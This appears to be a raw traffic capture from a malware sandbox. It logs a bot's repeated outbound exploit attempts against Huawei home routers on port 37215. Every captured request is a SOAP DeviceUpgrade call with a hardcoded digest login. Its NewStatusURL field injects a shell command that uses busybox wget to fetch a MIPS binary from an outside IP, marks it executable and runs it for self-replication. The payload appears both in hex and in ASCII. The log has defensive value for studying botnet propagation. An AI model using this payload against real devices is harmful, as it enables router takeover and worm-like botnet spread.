                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1245192.168.2.2348290197.237.51.19437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.326793909 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1246192.168.2.2338168157.219.109.9837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.326803923 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1247192.168.2.235496841.122.250.12837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.326828003 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1248192.168.2.2336036197.82.149.24637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.326848030 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1249192.168.2.233921060.42.236.10237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.326875925 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1250192.168.2.2342534218.99.104.3237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.327768087 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1251192.168.2.2339590157.253.141.1837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.327795029 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1252192.168.2.2359610157.31.169.4437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.327806950 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1253192.168.2.2335658157.232.132.23737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.327824116 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1254192.168.2.2345250157.218.248.22737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.327837944 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 